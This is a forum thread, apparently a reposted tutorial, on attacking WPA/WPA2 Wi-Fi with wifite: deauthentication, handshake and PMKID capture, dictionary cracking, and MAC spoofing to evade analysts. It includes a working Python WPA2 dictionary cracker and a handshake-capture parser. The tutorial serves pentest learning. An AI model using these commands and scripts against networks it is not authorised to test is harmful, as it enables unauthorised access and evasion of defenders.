Warriors.to Underground Forum - Hack Forum - Leak Forum

Wireless Penetration Testing: Wifite (part 2)

  • Thread starter Lexter
  • Start date Nov 30, 2022

WPA/WPA2 Handshake Capture


We talked about handshakes in detail in our previous article. Let's see how we can capture handshakes using wifite.
Here we simply type the name of the tool, since its default action is to scan for networks,
but we add the --skip-crack option, which stops the tool from cracking any handshake it captures:

wifite --skip-crack


How the tool works: as you can see in the screenshot, wifite automatically runs through its attacks against the chosen target. Here, I specified target "1" for my AP ("raaj"), and you can see that it tried the PMKID attack first, was unsuccessful, and then launched the handshake capture. The process is the same for any target: the tool decides for itself which attack works. Quite simple and hassle-free!

Here we have successfully captured a handshake and saved it under /root/hs/<name>.cap (wifite writes handshakes to an hs/ directory below the directory it was started from).
Now, if we run the command without the --skip-crack flag, the chain looks like this:

wifite
Target: 1

Chain:
  • Identify APs
  • Check the encryption (WEP, WPA/WPA2, WPS)
  • Attempt the PMKID attack
  • Attempt the handshake capture (deauthenticate clients, wait for the 4-way handshake)
  • If a handshake is found -> crack it

As you can see, it has cracked the handshake and printed the password "raj12345".
By default wifite hands the capture to aircrack-ng's dictionary attack in the background.

Some useful options

Filtering attacks: What if I want to skip the PMKID step from the chain above? We can do this with --no-pmkid:

wifite --no-pmkid


Scan time: Another useful option is -p, which takes a scan time in seconds. After that time wifite stops scanning and attacks every target it has found ("pillage" mode) instead of waiting for you to pick one, which makes it handy for unattended runs together with the other options:


wifite -p 10

Here, the tool scans for 10 seconds and then attacks the targets it has found.


In the screenshot the tool has finished its 10-second scan and moved on to attacking the targets.
PMKID timeout: This flag sets how long wifite waits for the access point to hand over a PMKID (the default is 300 seconds) before it gives up on the PMKID attack and moves on:

wifite --pmkid-timeout 130


Observe how there is a timeout of 130 seconds. I interrupted it before 130 seconds with CTRL+C to stop the attack. Note how it says "waiting for PMKID (1m 23s)".



Stop deauthentication (passive mode): --nodeauths stops the tool from sending deauthentication frames to clients (normally used to force a reconnect and thus a handshake capture); wifite then waits for a client to connect on its own. Combined with -e, which limits the run to one ESSID, this is useful when you must not disrupt the clients of a particular network:


wifite -e raaj --nodeauths

-e : ESSID (name of AP)



Targeting only WPA networks: --wpa lists only WPA/WPA2-encrypted networks (WPS-enabled ones included) and attacks those:


wifite --wpa


Ignore existing handshakes: Oftentimes we want a fresh start, or the handshakes we already have are not behaving as expected. For those times --new-hs ignores the existing handshakes in hs/ and captures new ones:


wifite --new-hs


Supplying a custom dictionary: For our dictionary attacks we can supply our own wordlist with the --dict flag (otherwise wifite falls back to its bundled wordlist-probable.txt or another wordlist it finds on the system):
wifite --dict /root/dict.txt


Now, setting the target as above, we see that the dictionary in fact works:

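What happens when the dictionary "in fact works", both in the default run above (where wifite hands the handshake to aircrack-ng) and with --dict: every candidate passphrase is stretched into a PMK, expanded into a PTK, and the PTK's KCK is used to recompute the MIC of the client's message 2; a match means the candidate is the passphrase. The block below is an added example written for this page, not wifite's or aircrack-ng's code. The handshake it attacks (SSID "raaj", MAC addresses, nonces, and a forged message 2 whose MIC is valid for "raj12345") is constructed inline so it runs offline, and it handles only Key Descriptor Version 2 (HMAC-SHA1, the usual WPA2-CCMP case).

```python
"""WPA2-PSK dictionary attack against a captured 4-way handshake, done by hand.
Added example for this page (not wifite's or aircrack-ng's code) showing the work behind
`wifite --dict`: PBKDF2 -> PMK, PRF-512 -> PTK, and the PTK's KCK verifies the MIC of M2."""
import hashlib
import hmac
import struct

MIC_OFFSET = 81   # EAPOL header (4) + Key Descriptor fields before the MIC (77)


def pmk_from_passphrase(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512: HMAC-SHA1 chain over "Pairwise key expansion" || min/max MACs || min/max nonces."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]                 # KCK = PTK[0:16], KEK = PTK[16:32], TK = PTK[32:48]


def eapol_mic(kck, eapol_frame):
    """Key Descriptor Version 2 (CCMP): MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16].
    Version 1 (TKIP) uses HMAC-MD5 and version 3 uses AES-CMAC; neither is handled here."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, m2_eapol, wordlist):
    """Return the first candidate whose KCK reproduces the MIC carried in message 2, else None."""
    captured_mic = m2_eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        candidate = candidate.strip()
        if not 8 <= len(candidate) <= 63:        # WPA passphrase length rule: skip junk early
            continue
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, m2_eapol), captured_mic):
            return candidate
    return None


# --- constructed handshake: values chosen for this example, not taken from a real capture ---
SSID = "raaj"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def _forge_m2(passphrase):
    """Build a message 2 (Key Info 0x010A, empty Key Data) whose MIC is valid for `passphrase`."""
    key = struct.pack(">BHHQ", 2, 0x010A, 16, 1) + SNONCE + bytes(16 + 8 + 8) + bytes(16) + b"\x00\x00"
    frame = struct.pack(">BBH", 2, 3, len(key)) + key
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


M2_EAPOL = _forge_m2("raj12345")
WORDLIST = ["password", "12345678", "short", "raaj2022", "raj12345", "Raj12345"]

if __name__ == "__main__":
    print(crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, M2_EAPOL, WORDLIST))
```

The cost of the attack is the 4096-round PBKDF2 per candidate, which is why the SSID matters (it is the salt, so rainbow tables only work per SSID) and why aircrack-ng, hashcat and john differ mainly in how fast they grind through this step, not in what they compute.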

Display cracked APs: To list every target already cracked, fetched from the tool's database (cracked.json in the working directory), we have the command:


wifite --cracked


Validating handshakes: To verify that the handshakes we have already captured really contain a usable 4-way handshake, we can have wifite check each hs/*.cap file with whatever wireless auditing tools are installed (tshark, aircrack-ng, cowpatty, ...):


wifite --check


Great, now I can proceed with tshark!
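What --check is actually looking for in those .cap files, and what the handshake capture earlier in this post had to collect, are the EAPOL-Key frames of the 4-way handshake. The following is an added example written for this page, not wifite's own code: it parses a libpcap file (raw 802.11 or radiotap link type), classifies each EAPOL-Key frame as message 1 to 4 from its Key Information bits, and reports per (BSSID, client) pair which messages were seen and whether the set is crackable. The capture is constructed inline with zeroed nonces and MICs, and the "crackable" rule (a client M2 paired by replay counter with an M1 or M3) is a simplification of what aircrack-ng and tshark check.

```python
"""Find WPA/WPA2 4-way handshake messages in a libpcap capture, per (BSSID, client) pair.
Added example for this page (not wifite's code), mimicking the decision `wifite --check`
delegates to tshark/aircrack-ng for the .cap files in hs/."""
import struct

LINKTYPE_IEEE802_11, LINKTYPE_RADIOTAP = 105, 127   # raw 802.11 / radiotap (airodump-ng output)
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"
KEY_DESC_FIXED_LEN = 95                             # EAPOL-Key fields through Key Data Length


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def pcap_frames(data):
    """Yield raw 802.11 frames from a classic libpcap file, radiotap header stripped."""
    magic = struct.unpack_from("<I", data, 0)[0]
    end = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    linktype = struct.unpack_from(end + "I", data, 20)[0] if end else None
    if linktype not in (LINKTYPE_IEEE802_11, LINKTYPE_RADIOTAP):
        raise ValueError("not a libpcap file with 802.11 frames")
    off = 24
    while off + 16 <= len(data):
        incl_len = struct.unpack_from(end + "IIII", data, off)[2]
        frame = data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if linktype == LINKTYPE_RADIOTAP:            # radiotap length: little-endian at offset 2
            frame = frame[struct.unpack_from("<H", frame, 2)[0]:]
        yield frame


def eapol_key(frame):
    """(bssid, client, key_info, replay_counter) for an EAPOL-Key data frame, else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 2 or frame[1] & 0x40:  # short, not Data, Protected
        return None
    to_ds, from_ds = frame[1] & 0x01, frame[1] & 0x02
    if from_ds and not to_ds:                        # AP -> client: Address 2 is the BSSID
        bssid, client = frame[10:16], frame[4:10]
    elif to_ds and not from_ds:                      # client -> AP: Address 1 is the BSSID
        bssid, client = frame[4:10], frame[10:16]
    else:
        return None
    body = frame[24 + (2 if frame[0] & 0x80 else 0):]   # skip QoS Control on QoS Data subtypes
    if len(body) < 12 or body[:8] != LLC_SNAP_EAPOL:
        return None
    ptype, length = struct.unpack_from(">xBH", body, 8)
    key = body[12:12 + length]
    if ptype != 3 or len(key) < KEY_DESC_FIXED_LEN:  # EAPOL type 3 = EAPOL-Key
        return None
    desc, key_info, _, replay = struct.unpack_from(">BHHQ", key, 0)
    return (mac_str(bssid), mac_str(client), key_info, replay) if desc in (2, 254) else None


def handshake_msg(key_info):
    """EAPOL-Key 'Key Information' bits -> handshake message 1-4 (None for group-key frames)."""
    if not key_info & 0x0008:                        # Key Type bit clear: group-key handshake
        return None
    ack, mic, secure, install = (bool(key_info & m) for m in (0x0080, 0x0100, 0x0200, 0x0040))
    if ack and not mic:
        return 1
    if mic and not ack:
        return 4 if secure else 2
    if ack and mic and install:
        return 3
    return None


def analyze(data):
    """Per (bssid, client): messages seen, and 'crackable' = a client M2 (SNonce + MIC) paired
    by replay counter with the AP message it answers (M1, same counter; or M3, counter M2+1)."""
    seen = {}
    for frame in pcap_frames(data):
        info = eapol_key(frame)
        msg = handshake_msg(info[2]) if info else None
        if msg:
            seen.setdefault((info[0], info[1]), {}).setdefault(msg, set()).add(info[3])
    return {pair: {"messages": sorted(msgs),
                   "crackable": any(rc in msgs.get(1, ()) or rc + 1 in msgs.get(3, ())
                                    for rc in msgs.get(2, ()))}
            for pair, msgs in seen.items()}


# --- constructed sample capture (zeroed nonces and MICs; only what the check inspects) ---
def _eapol_frame(bssid, client, from_ap, key_info, replay):
    fc = bytes([0x08, 0x02 if from_ap else 0x01])   # Data frame with FromDS or ToDS set
    addrs = client + bssid + bssid if from_ap else bssid + client + bssid
    key = struct.pack(">BHHQ", 2, key_info, 16, replay) + bytes(KEY_DESC_FIXED_LEN - 13)
    return fc + b"\x00\x00" + addrs + b"\x00\x00" + LLC_SNAP_EAPOL + struct.pack(">BBH", 2, 3, len(key)) + key


def _pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1669766400 + i, 0, len(f), len(f)) + f
    return out


AP, STA = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
AP2, STA2 = bytes.fromhex("0a1b2c3d4e5f"), bytes.fromhex("0c1d2e3f4a5b")
SAMPLE_PCAP = _pcap([
    _eapol_frame(AP, STA, True, 0x008A, 1),     # M1: ANonce, Ack
    _eapol_frame(AP, STA, False, 0x010A, 1),    # M2: SNonce, MIC, same replay counter
    _eapol_frame(AP, STA, True, 0x13CA, 2),     # M3: Install, Ack, MIC, Secure
    _eapol_frame(AP, STA, False, 0x030A, 2),    # M4: MIC, Secure
    _eapol_frame(AP2, STA2, True, 0x008A, 7),   # lone M1: the deauthed client never came back
])

if __name__ == "__main__":
    print(analyze(SAMPLE_PCAP))
```

The second pair in the sample is the failure mode you see most often after a deauth: the AP sends message 1, the client never re-associates, and the file contains no MIC to attack. That is what --new-hs is for, and why a handshake "found" by a quick grep for EAPOL is not necessarily one aircrack-ng will accept.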


Cracking a handshake file: The list of captured handshake files is now with us. What if I want to choose the cracking tool instead of using the default one? The command for that is --crack (not --cracked, which only lists already cracked targets):
wifite --crack

Choose target and tool afterwards

And as you can see, aircrack has cracked the password "raj12345".

Killing conflicting processes: This flag helps us kill all the jobs that may conflict with the working of the tool. It’s a great little cleanup technique before starting the tool
wifite --kill


MAC spoofing: MAC address spoofing is a useful technique to stay out of an analyst's view and avoid being identified by the real MAC address of your Wi-Fi adapter. First, we look at our Wi-Fi card's MAC address with ifconfig.
Note that this MAC address ends in 5C. That is all we need to tell whether the MAC is being spoofed or not.
Now we spoof this MAC address with the wifite command:


wifite --random-mac


Observe how the new MAC address ends in 09. Spoofing has worked and a random MAC has been put on the interface.
Once the job is done, this option automatically restores the original MAC address too. Very efficient.

Power filter: Access points that are far away often don't behave well while being attacked: there is a lot of noise, an attenuated signal and, obviously, packet drops. To be safe we set a power threshold so that wifite only lists Wi-Fi networks close enough to be communicated with without such errors.

Note that this value is in dB on wifite's own scale (the positive PWR column in its target list, not the negative dBm that airodump-ng prints). Let's set a threshold of 35 dB:
wifite --power 35


Now only APs with a signal strength of 35 dB or more will be shown and attacked.
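How the target list is narrowed down by --wpa, -e and --power, as an added example written for this page (not wifite's code): it parses the airodump-ng CSV that wifite itself reads while scanning and applies the three filters. The CSV rows are constructed for the example. Two things are assumptions rather than documented behaviour: the conversion from airodump's negative dBm to the positive dB figure wifite shows (RSSI + 100) is my reading of wifite's source, and rows where airodump reports -1 (no RSSI yet) are skipped here.

```python
"""Filter a scan the way wifite's target list does with --wpa, --power and -e.
Added example for this page (not wifite's code). It parses the airodump-ng CSV that wifite
reads while scanning. Assumptions: the dBm -> positive dB conversion (RSSI + 100) is how I read
wifite's source, and rows with power -1 (airodump has no RSSI) are skipped here."""
import csv
import io

# Constructed airodump-ng CSV: five access points, then the station table that follows it.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2022-11-30 10:00:01, 2022-11-30 10:02:10,  6, 130, WPA2, CCMP, PSK, -45, 120,  0,   0.  0.  0.  0,  4, raaj,
66:77:88:99:AA:BB, 2022-11-30 10:00:01, 2022-11-30 10:02:10, 11,  54, WPA2 WPA, CCMP TKIP, PSK, -78,  40,  0,   0.  0.  0.  0,  8, neighbor,
0A:1B:2C:3D:4E:5F, 2022-11-30 10:00:03, 2022-11-30 10:02:09,  1,  54, WEP, WEP, , -52,  90, 12,   0.  0.  0.  0,  6, oldwep,
0C:1D:2E:3F:4A:5B, 2022-11-30 10:00:05, 2022-11-30 10:01:50,  6, 130, OPN, , , -61,  30,  0,   0.  0.  0.  0,  9, coffee-ap,
12:34:56:78:9A:BC, 2022-11-30 10:00:09, 2022-11-30 10:00:09,  3,  54, WPA2, CCMP, PSK,  -1,   1,  0,   0.  0.  0.  0,  6, hidden,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2022-11-30 10:00:07, 2022-11-30 10:02:10, -50, 15, 00:11:22:33:44:55, raaj
"""


def parse_airodump_csv(text):
    """Access-point rows of an airodump-ng CSV as dicts; stops at the client (Station MAC) table."""
    aps = []
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or row[0] == "BSSID":
            continue
        if row[0] == "Station MAC":
            break
        if len(row) < 14:
            continue
        power = int(row[8])
        if power == -1:                      # airodump prints -1 when it has no RSSI for the AP
            continue
        aps.append({
            "bssid": row[0], "channel": int(row[3]), "privacy": row[5].strip(),
            "power": power + 100 if power < 0 else power,   # -45 dBm is shown as 55 by wifite
            "essid": row[13],
        })
    return aps


def select_targets(aps, wpa_only=False, min_power=0, essid=None):
    """Apply wifite-style filters: --wpa (WPA/WPA2, incl. mixed), --power <min dB>, -e <essid>."""
    chosen = [
        ap for ap in aps
        if (not wpa_only or "WPA" in ap["privacy"])
        and ap["power"] >= min_power
        and (essid is None or ap["essid"] == essid)
    ]
    return sorted(chosen, key=lambda ap: ap["power"], reverse=True)   # strongest first, like the list


if __name__ == "__main__":
    for ap in select_targets(parse_airodump_csv(SAMPLE_CSV), wpa_only=True, min_power=35):
        print(f'{ap["essid"]:<12} ch{ap["channel"]:<3} {ap["privacy"]:<10} {ap["power"]} dB')
```

With --wpa and --power 35 together only "raaj" survives: the WEP and open networks fall to the encryption filter and the mixed WPA2/WPA neighbour is dropped for being too weak (-78 dBm, 22 on wifite's scale), which is exactly the far-away AP the power filter is meant to keep out of the run.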